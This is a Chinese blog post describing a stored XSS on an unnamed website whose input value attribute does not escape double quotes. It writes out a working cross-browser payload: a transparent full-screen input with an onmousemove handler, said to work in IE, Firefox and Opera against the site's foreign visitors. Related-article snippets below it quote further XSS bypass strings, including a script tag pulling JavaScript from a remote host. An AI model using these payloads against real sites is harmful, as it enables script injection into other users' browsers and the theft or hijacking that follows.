关于属性中没有对双引号转义的XSS方式 FF IE Opera通杀

最新推荐文章于 2025-06-13 17:24:25 发布
原创 最新推荐文章于 2025-06-13 17:24:25 发布 · 1.8k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#opera #ie #input #测试

本文介绍了一种通过修改HTML元素属性并结合CSS样式和鼠标移动事件实现的跨站脚本(XSS)攻击方法,该方法能在多种浏览器中生效。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

某网站存在一个 storeXSS  利用点如下
<input type=text value="[xsscode]">
可以使用 双引号绕过去属性限制,但是不能采用 < > 比较郁闷
开始打算  
"style="kj:expression(EXP)
<input type=text value=""style="kj:expression(EXP)">
后来查了查资料!发现expression是IE 才能使用的!郁闷了!
而且要XSS的对象是老外 ,不一定会采用IE ,这样跨站攻击起来了,但是效果会大打折扣。
想想还是添加事件吧!但是,怎么触发这个事件呢!?   无奈之下让我想到恶心的利用方式,
采用style 进行绝对定位 然后透明效果 覆盖全屏幕,最后加入onmousemove事件

<input name="kj" value="kj021320" style="position:absolute;z-index:0;top:0px;width:100%; height:100%;left:0px;filter:alpha(opacity=0);-moz-opacity:0.0;opacity:0.0;" onmousemove="if(!window.k){alert(this.style.height=0);window.k=123;}">

最后测试了一下!结果IE FF2 FF3 都OK,另外令我惊喜的是 居然opera都通杀!
这个效果不错!哈!来先做个俯卧撑

xss绕过尖括号和双括号_xss防御及绕过-小记1
weixin_29315091的博客
12-23 3165
XSS搞安全的应该都很熟悉。本次并不是说其原理,仅是分享下在测试过程中遇到的案例。本人小白一枚,所以案例大佬们看着可能非常简单,就当是记录下自己笔记吧,不喜勿喷哈。。关于xss的防御,基本上都是采用输入过滤,输出编码。最近做的一个项目中的某个模块中,进行了输入过滤,采用跳转的形式。比如遇到<>或alert,响应包就会302跳转到固定网址。遇到这种黑名单的可以尝试各种绕过。有些输入是在i...
java xss漏洞修复_XSS漏洞修复方案 - zhang2xiang的个人空间 - OSCHINA - 中文开源技术交流社区...
weixin_33209661的博客
02-24 953
基本概念及解决办法比较典型的XSS攻击漏洞(Cascading Style Sheets, CSS),俗称跨站脚本攻击;解决办法:将特殊字符进行转义1、增加过滤器XssFilter.javapublic class XssFilter implements Filter {FilterConfig filterConfig = null;private List urlExclusion = nu...
php 防止单引号,双引号在接受页面转义
12-18
PHP页面中如果不希望出现以下情况:  单引号被转义为 /’  双引号转义为 /”  那么可以进行如下设置以防止:  方法一:在php.ini中设置:magic_quotes_gpc = Off  方法二: $str=stripcslashes($str)  您可能感兴趣的文章:简单概括PHP的字符串中单引号与双引号的区别PHP中单引号与双引号的区别分析PHP 单引号与双引号的区别php 输出双引号"与单引号”的方法PHP的单引号和双引号 字符串效率浅谈PHP中单引号和双引号到底有啥区别呢?替换php字符串中的单引号为双引号的方法
xss注入遇到转义,html编码绕过了解一哈
最新发布
ericalezl的博客
06-13 259
从返回的源码看,输入的双引号被 html 实体编码了,整体被当作字符串处理了。当我们输入 html 编码后的单引号,后端服务器没识别到单引号,不在添加转义符。可以看到服务器端给我们的单引号转义了,添加转义符方法不行了。那我们直接输入 html 实体编码后的单引号进行绕过。可以看到我们输入的 url 放到了。可以看到单引号成功输入到链接中。先正常留言查看返回情况。中传入 url 拼接。
XSS 绕过常用语句
Mr.Huang_的博客
09-16 4300
XSS 绕过常用语句 写在最前面::: 下文中 alert 都可以由 prompt 代替 最常用的 XSS 漏洞测试代码: <script>prompt("XSS")</script> <SCRIPT SRC=http://damit5.ml/xss.js></SCRIPT> 在输入(Input)标签里 <INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>
我遇到的参数传递中 双引号单引号嵌套问题
12-11
例如,`id`、`style`等属性值内部都含有双引号,而这些双引号不能直接嵌套在已由双引号包围的字符串中,否则会导致字符串过早结束。为了解决这个问题,通常会使用单引号来包围这些内部的双引号,就像这样:`id='cake...
js、html中的单引号、双引号及其转义使用.pdf
02-20
js、html中的单引号、双引号及其转义使用.pdf
js、html中的单引号、双引号及其转义使用.docx
02-20
js、html中的单引号、双引号及其转义使用.docx
json解析时遇到英文双引号报错的解决方法
10-18
例如,确保所有的键值对都正确地用双引号括起来,确保所有字符串值都使用反斜杠对双引号进行转义,以及确保没有多余的逗号或缺少必要的分隔符。 总结来说,当解析JSON数据时遇到英文双引号导致的报错问题,可以采用...
过滤导致json.parse出现SyntaxError的特殊字符
pxs623的专栏
09-07 2858
参照 http://www.cnblogs.com/rubylouvre/archive/2011/02/12/1951760.html 写的不兼容字符替换为空   var jsonfilter = function (string) {     var reg=/[\u0000-\u001f\u000B\u000C\u00A0\uFEFF\u1680\u180E\u2000\u2001
XSS过滤绕过
qq_39654116的博客
01-17 5937
目录过滤测试示例输入在script标签中非常规的事件监听HREF内容可控变换JavaScript变换Vbscript变换输入在属性里JSONSVG标签浏览器bug常见标签利用link远程包含js文件javascript伪协议属性payload常用的payload各种alert伪协议Chrome XSS auditor bypass长度限制jquery sourceMappingURL图片名过期的payloadcssmarkdowniframeformmeta绕过过滤空格大小写混淆双写绕过字符拼接编码绕过编码
XSS绕过技术
热门推荐
suifengshiyu的专栏
03-27 2万+
本文转载自:http://www.2cto.com/Article/201211/168950.html Cross-SiteScripting(XSS)是一类出现在web应用程序上的安全弱点,攻击者可以通过XSS插入一些代码,使得访问页面的其他用户都可以看到,XSS通常是可以被看作漏洞的。它允许攻击者绕过安全机制,通过尝试各种不同的方法插入恶意代码,攻击者可以得到敏感页面的权限,会话,co
【网络安全 / 前端 XSS 防护】一文带你了解 HTML 的特殊字符转义及编码
胡西风的博客
04-01 741
如果用户输入的内容未经过转义或编码处理,并且在个人简介页面上直接显示,那么攻击者可以在自我介绍中插入恶意 HTML 标签或属性。例如,当浏览器检测到页面中的特殊字符被正确转义或编码时,它们会将其视为纯文本,不会将其解析为 HTML 标签或脚本。转义时应考虑多重编码:当字符传输经过多个层级或环节时,确保在每个层级或环节上都进行了正确的编码和转义处理。这样,HTML 标签和属性不再被解析为可执行的代码,保护了页面和用户的安全。这样,URL 中的特殊字符被转义为实体编码,防止了恶意代码的执行。
关于springboot中 处理XSS转义
weixin_34291004的博客
05-12 2069
2019独角兽企业重金招聘Python工程师标准>>> ...
Xss漏洞常见绕过过滤攻击场景
chaottop的博客
05-04 3364
在某些情况下,后台作的过滤非常简单,只对一些特殊的字符串作黑名单过滤,导致可直接通过字母大小写绕过后台的过滤。如下例子
xssbypass_【渗透技巧】XSS三重URL编码绕过实例
weixin_30126409的博客
12-23 4143
0x00 前言跨站脚本攻击(Cross Site Scripting),缩写为XSS,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。在黑盒渗透中,XSS在很多网站中普遍存在,这边分享一个简单有意思的XSS三重URL编码绕过漏洞实例。0x01 漏洞实例某次测试中,遇到一个很奇葩的XSS,我们先来加一个双...
我的渗透笔记之XSS绕过技巧
xf555er的博客
03-03 1万+
1、单引号、双引号和尖括号之间的闭合。 有些标签例如,构造的payload应该为” >,那么组成的标签为<input value=""><script>alert(1)</script>" 2、尖括号被转义,利用注释符号和一些属性事件. 例如,构造payload为" οnclick=alert(1)//,组成的标签为<input value="" o...
python中对双引号转义
12-12
在Python中,双引号可以使用反斜杠(\)进行转义。当字符串中使用双引号时,反斜杠可以告诉解释器这是一个字面意义上的双引号,而不是字符串的结束标志。 例如: ```python # 使用反斜杠转义双引号 string = "He ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值